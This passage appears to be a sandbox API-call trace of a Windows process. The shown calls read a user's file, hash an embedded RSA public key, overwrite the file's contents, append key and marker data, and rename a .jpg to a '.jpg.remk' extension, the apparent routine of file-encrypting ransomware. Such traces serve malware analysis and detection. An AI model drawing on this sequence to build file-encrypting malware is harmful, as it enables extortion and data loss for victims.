hFile=0x640, liDistanceToMove=0x12ea3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.409] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.411] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.411] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12ec9, lpOverlapped=0x0) returned 1 [0236.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.412] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.413] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.413] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.413] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.413] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.413] GetLastError () returned 0x0 [0236.414] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.414] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.414] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.414] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.414] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12ed0) returned 0x37cf820 [0236.414] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ceb08 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ceb50 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc768 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.415] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc768 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc750 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.416] GetCurrentThreadId () returned 0x314 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5a30 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.416] GetCurrentThreadId () returned 0x314 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc768 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc798 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7e0 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc780 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0236.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc720 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ceb50 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.421] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x12ec4, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x12ec4, lpOverlapped=0x0) returned 1 [0236.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.422] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12ec9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.422] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.422] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.423] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.423] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.423] CloseHandle (hObject=0x640) returned 1 [0236.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0236.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a2d00 | out: hHeap=0x630000) returned 1 [0236.432] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\1Zf e6GVWkTdL6S3dtG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\1zf e6gvwktdl6s3dtg.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\1Zf e6GVWkTdL6S3dtG.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\1zf e6gvwktdl6s3dtg.jpg.remk")) returned 1 [0236.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.433] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.435] FindNextFileW (in: hFindFile=0x31de130, 